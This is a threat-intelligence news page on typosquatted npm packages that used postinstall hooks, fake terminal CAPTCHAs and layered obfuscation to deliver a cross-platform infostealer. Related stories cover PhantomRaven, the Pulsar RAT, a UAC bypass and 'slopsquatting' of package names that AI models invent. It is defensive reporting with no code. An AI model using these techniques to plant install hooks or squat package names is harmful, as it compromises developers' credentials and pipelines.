Malicious npm Packages Distribute PyInstaller Infostealer via Typosquatting and Fake CAPTCHA
Ten malicious packages were discovered on the npm registry, masquerading as popular JavaScript libraries through typosquatting techniques. These packages, which included names like typescriptjs, deezcord.js, and react-router-dom.js, were designed to trick developers into downloading them by mimicking legitimate projects. Upon installation, a postinstall script executed a heavily obfuscated loader that displayed a fake CAPTCHA in the terminal to appear legitimate, then downloaded and ran a 24MB infostealer built with PyInstaller. This malware targeted Windows, Linux, and macOS systems, stealing credentials from system keyrings, browsers, and authentication services. The campaign went undetected for an extended period, resulting in nearly 10,000 downloads before being reported to npm, with the malicious packages still available at the time of reporting.
The infostealer's deployment leveraged multiple layers of obfuscation, including self-decoding wrappers, XOR decryption, and control-flow obfuscation, to evade static analysis and detection. The attack highlights the ongoing risks posed by supply chain threats in open-source ecosystems, particularly through typosquatting and social engineering tactics. Security researchers emphasized the importance of vigilance when installing npm packages and recommended enhanced scrutiny of package names and sources to mitigate the risk of inadvertently installing malicious software.
Timeline
Oct 29, 2025
Researchers disclose cross-platform npm infostealer campaign details
Security reporting revealed that the malicious packages fetched a PyInstaller-based infostealer and in some cases used fake CAPTCHA-style social engineering to trigger execution. The disclosures identified the campaign as a cross-platform supply-chain threat affecting developer environments.
Oct 29, 2025
Ten typosquatted npm packages are published with credential-stealing code
Attackers uploaded 10 malicious npm packages masquerading as legitimate libraries in a typosquatting campaign. The packages targeted developers on Windows, macOS, and Linux and were designed to steal credentials and other sensitive data.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Malware
Sources
Related Stories
Malicious npm Packages Stealing Developer Credentials Across Platforms
Security researchers have uncovered multiple campaigns involving malicious npm packages designed to steal developer credentials and sensitive information from Windows, macOS, and Linux systems. In one operation, ten typosquatted packages impersonated popular libraries such as TypeScript, discord.js, ethers.js, and others, using sophisticated obfuscation, fake CAPTCHA prompts, and postinstall hooks to deploy an information stealer that harvested credentials from system keyrings, browsers, and authentication services. The malware executed in a new terminal window to evade detection and sent stolen data, including IP addresses, to external servers. Another large-scale campaign, dubbed 'PhantomRaven,' involved 126 npm packages and over 86,000 downloads, targeting authentication tokens, CI/CD secrets, and GitHub credentials. These packages leveraged remote dynamic dependencies to fetch and execute payloads during installation, profiling infected devices and exfiltrating secrets for potential supply chain attacks. The attackers employed techniques such as slopsquatting, where AI-generated package recommendations led developers to install non-existent, malicious packages. Some packages impersonated tools from GitLab and Apache, and many remained available on npm at the time of reporting. The campaigns highlight the ongoing risks in the npm ecosystem, with attackers exploiting both user trust and platform weaknesses to compromise developer environments and CI/CD pipelines. Security experts warn that the theft of tokens and credentials could enable further attacks, including the introduction of malicious code into legitimate projects and broader supply chain compromises.
1 months ago
Malicious and Credential-Stealing npm Packages Target Developers via Obfuscation and Typosquatting
Multiple malicious npm packages have been discovered targeting developers by employing advanced obfuscation techniques and typosquatting to mimic popular legitimate packages such as *TypeScript*, *discord.js*, *ethers.js*, *nodemon*, and *Claude Code*. Security researchers revealed that these packages use up to four layers of obfuscation—including eval wrapping, XOR encryption, URL encoding, and control flow manipulation—to evade static analysis and conceal credential-stealing malware. The attack chain often begins with deceptive tactics, such as displaying fake CAPTCHAs, and proceeds to exfiltrate sensitive information like IP addresses and credentials to attacker-controlled servers. In one notable case, a package impersonating the official Anthropic CLI was found to proxy commands and data back to the threat actor, enabling both credential theft and remote command execution. These incidents highlight the persistent risks posed by weak validation and oversight in the npm ecosystem, allowing threat actors to publish lookalike packages that are difficult to distinguish from legitimate ones. The sophisticated payloads not only target local developer environments but can also compromise CI/CD pipelines, amplifying the potential impact. Security experts emphasize the need for improved package metadata validation and greater vigilance among developers to mitigate the risk of supply chain attacks through open-source dependencies.
1 months ago
Malicious npm Packages Using Typosquatting and Payload Obfuscation
Threat researchers reported an **npm supply-chain attack** in which a typosquatted package (`buildrunner-dev`) delivered **Pulsar RAT** via a multi-stage Windows infection chain. The package executed a script that fetched a large, heavily obfuscated batch file (`packageloader.bat`) containing mostly “noise” to evade static detection, performed security-product checks (including **ESET**, **Malwarebytes**, and **F-Secure**), established persistence by copying itself as `protect.bat` into a hidden folder, and attempted privilege escalation/UAC bypass using `fodhelper.exe`. Separate supply-chain reporting highlighted how package-name deception is evolving beyond human typos into **“slopsquatting”** (AI/hallucination squatting), where attackers register package names that LLMs commonly invent and then rely on developers installing them on AI recommendation. Documented tradecraft includes malicious `postinstall` scripts to exfiltrate secrets from developer environments (API keys, cloud tokens, npm auth tokens) and the use of URL-based dependencies to fetch external payloads at install time, allowing the published package to appear benign to naive scanners.
1 months ago